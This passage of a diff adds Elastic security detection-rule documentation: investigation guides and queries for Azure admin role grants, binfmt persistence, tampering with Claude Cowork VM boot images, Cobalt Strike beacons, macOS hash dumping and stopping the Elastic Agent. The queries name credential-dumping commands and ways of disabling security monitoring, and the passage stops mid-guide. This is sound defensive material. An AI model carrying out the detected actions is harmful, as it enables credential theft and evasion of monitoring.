Administrator: a8889054-8d42-49c9-bc1c-52486c10e7cd +- Role Based Access Control Administrator: f58310d9-a9f6-439a-9e8d-f62e7b41a168 +- User Access Administrator: 18d7d88d-d35e-4fb5-a5c3-7773c20a72d9 + + +*Possible investigation steps* + + +- Identify the user who assigned the role and examine their recent activity for any suspicious actions. +- Review the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Check the history of role assignments for the user who was assigned the role to determine if this is a recurring pattern or a one-time event. + - Additionally, identify the lifetime of the targeted user account to determine if it is a newly created account or an existing one. +- Determine if the user assigning the role historically has the necessary permissions to assign such roles and has done so in the past. +- Investigate any recent changes or activities performed by the newly assigned administrator to identify any suspicious actions or configurations that may have been altered. +- Correlate with other logs, such as Microsoft Entra ID sign-in logs, to identify any unusual access patterns or behaviors for the user. + + +*False positive analysis* + + +- Legitimate administrators may assign built-in administrator roles during routine operations, maintenance or as required for onboarding new staff. +- Azure Kubernetes Service control-plane operations may assign the Contributor role to service principals. Assignments initiated by the Microsoft-owned AzureContainerService application are excluded. +- Repeated writes for the same role assignment ID by the same initiating principal are suppressed for one hour. +- Review internal tickets, change logs, or admin activity dashboards for approved operations. + + +*Response and remediation* + + +- If administrative assignment was not authorized: + - Immediately remove the built-in administrator role from the account. + - Disable or lock the account and begin credential rotation. + - Audit activity performed by the account after elevation, especially changes to role assignments and resource access. +- If suspicious: + - Notify the user and confirm whether they performed the action. + - Check for any automation or scripts that could be exploiting unused elevated access paths. + - Review conditional access and PIM (Privileged Identity Management) configurations to limit elevation without approval. +- Strengthen posture: + - Require MFA and approval for all privilege escalation actions. + - Consider enabling JIT (Just-in-Time) access with expiration. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: azure.activitylogs and + event.action: "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE" and + azure.activitylogs.properties.requestbody.properties.roleDefinitionId: + ( + *18d7d88d-d35e-4fb5-a5c3-7773c20a72d9* or + *f58310d9-a9f6-439a-9e8d-f62e7b41a168* or + *b24988ac-6180-42a0-ab88-20f7382dd24c* or + *8e3af657-a8ff-443c-a75c-2fe8c4bcb635* or + *92b92042-07d9-4307-87f7-36a593fc5850* or + *a8889054-8d42-49c9-bc1c-52486c10e7cd* + ) and not ( + azure.activitylogs.identity.claims.appid: "7319c514-987d-4e9b-ac3d-d38c4f427f4c" and + azure.activitylogs.identity.authorization.evidence.role: "Service Owner role" and + azure.activitylogs.identity.authorization.evidence.principal_type: "ServicePrincipal" and + azure.activitylogs.properties.requestbody.properties.roleDefinitionId: *b24988ac-6180-42a0-ab88-20f7382dd24c* + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-binfmt-configuration-file-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-binfmt-configuration-file-creation.asciidoc new file mode 100644 index 0000000000..87a628fb0c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-binfmt-configuration-file-creation.asciidoc @@ -0,0 +1,154 @@ +[[prebuilt-rule-8-19-32-binfmt-configuration-file-creation]] +=== Binfmt Configuration File Creation + +This rule detects the creation of a binfmt configuration file. Binfmt is a utility that is used to configure the behavior of the Linux kernel when executing binary files. By creating a malicious binfmt configuration file, threat actors can execute a backdoor script or command on the target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dfir.ch/posts/today_i_learned_binfmt_misc/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Platform: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Binfmt Configuration File Creation* + + +This rule detects creation of Linux binfmt configuration files or registrations that alter how the kernel handles executable formats, which may establish persistent command execution. An attacker can register a crafted binary signature and interpreter so that launching a matching executable automatically invokes a backdoor script under the initiating user’s privileges. + + +*Possible investigation steps* + + +- Inspect the new configuration or registration content for unusual magic bytes, masks, flags, extensions, and interpreter paths that reference scripts, writable directories, temporary locations, or network-mounted files. +- Review the creating process’s user, command line, parent chain, working directory, package provenance, and nearby shell or privilege-escalation activity to determine whether the change was authorized. +- Correlate the event with systemd-binfmt restarts, writes to the binfmt_misc register interface, and subsequent execution of the configured interpreter or matching binaries. +- Search across the environment for the same configuration content, interpreter path, file hash, or responsible account to identify additional affected hosts and determine campaign scope. +- If unauthorized, preserve the configuration and relevant telemetry, disable or unregister the handler, remove persistence artifacts, and investigate the originating account and process for further compromise. + + +*False positive analysis* + + +- An administrator or approved automation may create a binfmt configuration to support a legitimate binary format, which analysts can verify by reviewing the change record, responsible account, configuration contents, and interpreter path. +- An authorized package installation or system update may register or replace a binfmt handler, which analysts can confirm by correlating the event with package activity and validating the creating process and file against expected system changes. + + +*Response and remediation* + + +- Isolate the affected Linux host from untrusted networks while preserving approved management access, volatile evidence, and copies of the malicious binfmt configuration and interpreter. +- Unregister the malicious handler under `/proc/sys/fs/binfmt_misc`, remove its files from binfmt configuration directories, delete associated backdoor scripts or binaries, and restart `systemd-binfmt` only after validating remaining entries. +- Escalate immediately to incident response if the configured interpreter executed, root privileges were involved, credentials may have been exposed, or matching artifacts appear on additional hosts. +- Revoke attacker-controlled sessions, rotate credentials used on the host, and search for related scheduled tasks, services, startup files, modified SSH keys, and payloads created by the responsible process. +- Reimage the system from a known-good baseline when integrity cannot be established; otherwise restore trusted configuration files and packages, verify kernel and system binaries, and confirm only approved binfmt handlers remain. +- Restrict write access to binfmt configuration paths and registration interfaces, enforce least privilege for administrative automation, and monitor future handler creation, registration, and interpreter execution. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action != "deletion" and process.executable != null and +file.path like ( + "/etc/binfmt.d/*.conf", "/run/binfmt.d/*.conf", "/usr/local/lib/binfmt.d/*.conf", "/usr/lib/binfmt.d/*.conf", + "/proc/sys/fs/binfmt_misc/register", "/proc/sys/fs/binfmt_misc/*" +) and +not ( + file.path like ( + "/usr/lib/binfmt.d/python3.*.conf", "/usr/lib/binfmt.d/qemu-*-static.conf", + "/proc/sys/fs/binfmt_misc/status" + ) or + process.executable == "/usr/lib/systemd/systemd-binfmt" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-claude-cowork-vm-boot-image-tamper.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-claude-cowork-vm-boot-image-tamper.asciidoc new file mode 100644 index 0000000000..cb0a21ad64 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-claude-cowork-vm-boot-image-tamper.asciidoc @@ -0,0 +1,144 @@ +[[prebuilt-rule-8-19-32-claude-cowork-vm-boot-image-tamper]] +=== Claude Cowork VM Boot Image Tamper + +Detects unexpected modification of Claude Desktop Cowork VM boot images (kernel, initrd, root filesystem). Adversaries with user-context access can rewrite these stored images so later Cowork sessions boot attacker-controlled code inside a virtual instance that host EDR cannot inspect by default. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://y637f9qq2x.com/posts/cowork-boot-trust + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Claude Cowork VM Boot Image Tamper* + + +Cowork boots a local Linux VM from images under the user's Claude AppData / Application Support tree. Those files are +writable by the user and are not integrity-checked before boot. A non-Claude writer changing them is a strong signal of +post-compromise defense evasion: later Cowork sessions can run attacker code inside a sanctioned Hyper-V / +Virtualization.framework guest that host EDR does not see by default. This does not grant new privileges. + + +*Possible investigation steps* + + +- Confirm the writer: `process.name`, `process.executable`, `process.parent.executable`, and `user.name`. This rule + already excludes Claude Desktop (`claude.exe` under `WindowsApps\Claude_*\app\`, and `Claude` / + `Claude Helper` under `/Applications/Claude.app/`). Any other writer (script host, LOLBin, unsigned binary) is + unexpected. +- Note which artifact changed (`file.name` / `file.path`) and `event.action`: + - `initrd` / `initrd.zst`: primary PoC target; both are often replaced together so the service cannot re-extract a + clean initrd from the `.zst`. + - `vmlinuz` / `rootfs.*` / `smol-bin.vhdx`: full guest control if replaced. +- Pivot on `process.entity_id` / `host.id` for ~30m around the alert: how the writer started, other file writes under + the Claude package path, and whether `claude.exe` / Claude.app then started a Cowork session. +- If Cowork runs afterward, check whether the session failed and Claude re-downloaded images (careless tamper) or + continued normally (payload may have kept the expected guest daemon alive). +- Treat this as evidence of existing host compromise; hunt for the initial access that produced the writer process. + + +*False positive analysis* + + +- Claude Desktop updates should not alert; if they do, the install path likely changed (new WindowsApps package layout + or non-AppX install) and the allowlist needs updating, not an exception for the writer name alone. +- Backup or sync tools rewriting these exact filenames are uncommon; require a stable `process.executable` before + adding an exception. This rule watches create/overwrite/rename/modification only; deletions are out of scope. + + +*Response and remediation* + + +- Delete or restore the affected bundle directory (Windows: + `%LOCALAPPDATA%\Packages\Claude_*\LocalCache\Roaming\Claude\vm_bundles\claudevm.bundle\`; macOS: + `~/Library/Application Support/Claude/vm_bundles/claudevm.bundle/`) and let Claude re-download trusted images, or + restore from a known-good backup. +- Isolate the host and investigate the writer process lineage; rotate credentials and secrets available to that user. +- Search the environment for the same writer hash/path and for other unexpected modifications under Claude package + paths. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type in ("windows", "macos") and + event.action in ("creation", "modification", "overwrite", "rename") and + event.outcome == "success" and + file.path : ( + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/initrd", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/initrd.zst", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/vmlinuz", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/vmlinuz.zst", + "/Users/*/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\initrd", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\initrd.zst", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\vmlinuz", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\rootfs.vhdx", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\vm_bundles\\claudevm.bundle\\smol-bin.vhdx" + ) and + not ( + (process.name : "claude.exe" and + process.executable : "?:\\Program Files\\WindowsApps\\Claude_*\\app\\claude.exe") or + (process.name : ("Claude", "Claude Helper") and + process.executable like "/Applications/Claude.app/*") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Run Virtual Instance +** ID: T1564.006 +** Reference URL: https://attack.mitre.org/techniques/T1564/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-cobalt-strike-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-cobalt-strike-command-and-control-beacon.asciidoc new file mode 100644 index 0000000000..75aecbe81f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-cobalt-strike-command-and-control-beacon.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-19-32-cobalt-strike-command-and-control-beacon]] +=== Cobalt Strike Command and Control Beacon + +Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.morphisec.com/fin7-attacks-restaurant-industry +* https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html +* https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint +* Rule Type: ESQL +* Data Source: Fortinet +* Data Source: PAN-OS +* Resources: Investigation Guide + +*Version*: 112 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Cobalt Strike Command and Control Beacon* + + +Cobalt Strike is a penetration testing tool often repurposed by attackers for malicious activities, particularly for establishing command and control (C2) channels. Adversaries exploit its beaconing feature to communicate with compromised systems using common protocols like HTTP or TLS. The detection rule identifies suspicious network patterns, such as specific domain naming conventions, indicative of Cobalt Strike's C2 activity, helping analysts pinpoint potential threats. + + +*Possible investigation steps* + + +- Review the alert details to identify the specific domain that triggered the rule, focusing on the pattern [a-z]{3}.stage.[0-9]{8}\..* to determine if it matches known malicious domains. +- Analyze the network traffic logs associated with the alert, specifically looking at events categorized under network or network_traffic with types tls or http, to gather more context about the communication. +- Investigate the source IP address and destination domain involved in the alert to determine if they have been associated with previous malicious activities or are listed in threat intelligence databases. +- Examine the timeline of the network activity to identify any patterns or anomalies that could indicate a larger campaign or coordinated attack. +- Check for any related alerts or incidents in the security information and event management (SIEM) system that might provide additional context or indicate a broader compromise. +- Assess the affected endpoint for any signs of compromise, such as unusual processes or connections, to determine if further containment or remediation actions are necessary. + + +*False positive analysis* + + +- Legitimate software updates or patch management systems may use similar domain naming conventions. Review and whitelist known update servers to prevent false alerts. +- Internal development or testing environments might mimic Cobalt Strike's domain patterns for legitimate purposes. Identify and exclude these environments from the rule. +- Automated scripts or tools that generate network traffic with similar domain structures can trigger false positives. Monitor and document these tools, then create exceptions for their activity. +- Some content delivery networks (CDNs) might use domain patterns that match the rule's criteria. Verify and exclude trusted CDNs to reduce unnecessary alerts. +- Regularly review and update the list of exceptions to ensure that only verified non-threatening behaviors are excluded, maintaining the rule's effectiveness. + + +*Response and remediation* + + +- Isolate the affected systems immediately to prevent further communication with the Cobalt Strike C2 server. This can be done by disconnecting the network or using network segmentation techniques. +- Conduct a thorough forensic analysis of the compromised systems to identify the extent of the breach and any additional payloads or backdoors that may have been installed. +- Remove any identified Cobalt Strike beacons or related malware from the affected systems using updated antivirus or endpoint detection and response (EDR) tools. +- Change all credentials and access tokens that may have been exposed or used on the compromised systems to prevent unauthorized access. +- Monitor network traffic for any signs of re-infection or communication attempts with known Cobalt Strike C2 domains, using updated threat intelligence feeds. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or data have been compromised. +- Implement network-level controls, such as blocking known malicious domains and IP addresses associated with Cobalt Strike, to prevent future attacks. + + +*Threat intel* + + +This activity has been observed in FIN7 campaigns. + +==== Rule query + + +[source, js] +---------------------------------- +from packetbeat-*, filebeat-*, logs-network_traffic.*, logs-panw.panos*, logs-fortinet_fortigate.log-* metadata _id, _version, _index +| where ( + (event.category in ("network", "network_traffic") and network.protocol in ("tls", "http")) or + (data_stream.dataset == "panw.panos" and network.application in ("ssl", "web-browsing")) or + data_stream.dataset in ("network_traffic.tls", "network_traffic.http", "fortinet_fortigate.log") + ) +| where destination.domain RLIKE "[a-z]{3}\\.stage\\.[0-9]{8}\\..*" +| keep @timestamp, destination.domain, source.ip, destination.ip, network.protocol, data_stream.dataset, _id, _version, _index + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-dumping-account-hashes-via-built-in-commands.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-dumping-account-hashes-via-built-in-commands.asciidoc new file mode 100644 index 0000000000..962796d8ff --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-dumping-account-hashes-via-built-in-commands.asciidoc @@ -0,0 +1,160 @@ +[[prebuilt-rule-8-19-32-dumping-account-hashes-via-built-in-commands]] +=== Dumping Account Hashes via Built-In Commands + +Identifies the execution of macOS built-in commands used to dump user account hashes. Adversaries may attempt to dump credentials to obtain account login information in the form of a hash. These hashes can be cracked or leveraged for lateral movement. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored +* https://www.unix.com/man-page/osx/8/mkpassdb/ + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic +* Massimo Bertocchi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Dumping Account Hashes via Built-In Commands* + + +In macOS environments, built-in commands like `defaults` and `mkpassdb` can be exploited by adversaries to extract user account hashes, which are crucial for credential access. These hashes, once obtained, can be cracked to reveal passwords or used for lateral movement within a network. The detection rule identifies suspicious process executions involving these commands and specific arguments, signaling potential credential dumping activities. + + +*Possible investigation steps* + + +- Review the process execution details to confirm the presence of the `defaults` or `mkpassdb` commands with arguments like `ShadowHashData` or `-dump`, as these are indicative of credential dumping attempts. +- Identify the user account associated with the process execution to determine if the activity aligns with expected behavior for that user or if it appears suspicious. +- Check the historical activity of the involved user account and the host to identify any patterns or anomalies that could suggest unauthorized access or lateral movement. +- Investigate any network connections or subsequent processes initiated by the suspicious process to assess potential data exfiltration or further malicious actions. +- Correlate the event with other security alerts or logs from the same host or user account to build a comprehensive timeline of the activity and assess the scope of the potential compromise. + + +*False positive analysis* + + +- System administrators or security tools may legitimately use the `defaults` or `mkpassdb` commands for system maintenance or auditing purposes. To manage these, create exceptions for known administrative accounts or tools that regularly execute these commands. +- Automated scripts or management software might invoke these commands as part of routine operations. Identify and whitelist these scripts or software to prevent unnecessary alerts. +- Developers or IT personnel might use these commands during testing or development phases. Establish a process to temporarily exclude these activities by setting up time-bound exceptions for specific user accounts or devices. +- Security assessments or penetration tests could trigger this rule. Coordinate with security teams to schedule and document these activities, allowing for temporary rule adjustments during the testing period. + + +*Response and remediation* + + +- Immediately isolate the affected macOS system from the network to prevent further lateral movement or data exfiltration. +- Terminate any suspicious processes identified as using the `defaults` or `mkpassdb` commands with the specified arguments to halt ongoing credential dumping activities. +- Conduct a thorough review of user accounts on the affected system to identify any unauthorized access or changes, focusing on accounts with elevated privileges. +- Reset passwords for all potentially compromised accounts, especially those with administrative access, and enforce strong password policies. +- Analyze system logs and network traffic to identify any additional systems that may have been accessed using the compromised credentials, and apply similar containment measures. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the full scope of the breach. +- Implement enhanced monitoring and alerting for similar suspicious activities across the network to detect and respond to future attempts promptly. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "macos" and event.type in ("start","process_started") and ( + (process.name == "defaults" and process.args like~ "ShadowHashData") or + (process.name == "mkpassdb" and process.args == "-dump") or + (process.name == "dscl" and process.args like~ "ShadowHashData") or + ( + process.name in ("plutil","cat","strings","xxd","head") and + process.args like "/var/db/dslocal/nodes/Default/users/*.plist" + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-agent-service-terminated.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-agent-service-terminated.asciidoc new file mode 100644 index 0000000000..e78f5f73d7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-agent-service-terminated.asciidoc @@ -0,0 +1,189 @@ +[[prebuilt-rule-8-19-32-elastic-agent-service-terminated]] +=== Elastic Agent Service Terminated + +Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 115 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Elastic Agent Service Terminated* + + +The Elastic Agent is a crucial component for monitoring and securing endpoints across various operating systems. It ensures continuous security oversight by collecting and analyzing data. Adversaries may attempt to disable this agent to evade detection, compromising system defenses. The detection rule identifies suspicious termination activities by monitoring specific processes and commands across Windows, Linux, and macOS, flagging potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the event logs to identify the exact process and command used to terminate the Elastic Agent, focusing on the process names and arguments such as "net.exe", "sc.exe", "systemctl", and "pkill" with arguments like "stop", "uninstall", or "disable". +- Check the timeline of events around the termination to identify any preceding suspicious activities or anomalies that might indicate an adversary's presence or actions. +- Investigate the user account associated with the process termination to determine if it was authorized or if there are signs of account compromise. +- Examine the host for any other signs of tampering or compromise, such as unauthorized changes to system configurations or the presence of other malicious processes. +- Verify the current status of the Elastic Agent on the affected host and attempt to restart it if it is not running, ensuring that security monitoring is restored. +- Correlate this event with other alerts or logs from the same host or network to identify potential patterns or coordinated attack activities. + + +*False positive analysis* + + +- Routine maintenance activities may trigger the rule if administrators use commands like systemctl or service to stop the Elastic Agent for updates or configuration changes. To manage this, create exceptions for known maintenance windows or authorized personnel. +- Automated scripts or deployment tools that temporarily disable the Elastic Agent during software installations or updates can cause false positives. Identify these scripts and whitelist their execution paths or specific arguments. +- Testing environments where Elastic Agent is frequently started and stopped for development purposes might generate alerts. Exclude these environments by specifying their hostnames or IP addresses in the rule exceptions. +- Security tools or processes that interact with the Elastic Agent, such as backup solutions or system monitoring tools, might inadvertently stop the service. Review these interactions and adjust the rule to ignore specific process names or arguments associated with these tools. +- User-initiated actions, such as troubleshooting or system performance optimization, may involve stopping the Elastic Agent. Educate users on the impact of these actions and establish a protocol for notifying the security team when such actions are necessary. + + +*Response and remediation* + + +- Immediately isolate the affected host from the network to prevent further unauthorized access or potential lateral movement by adversaries. +- Verify the status of the Elastic Agent on the affected host and attempt to restart the service. If the service fails to restart, 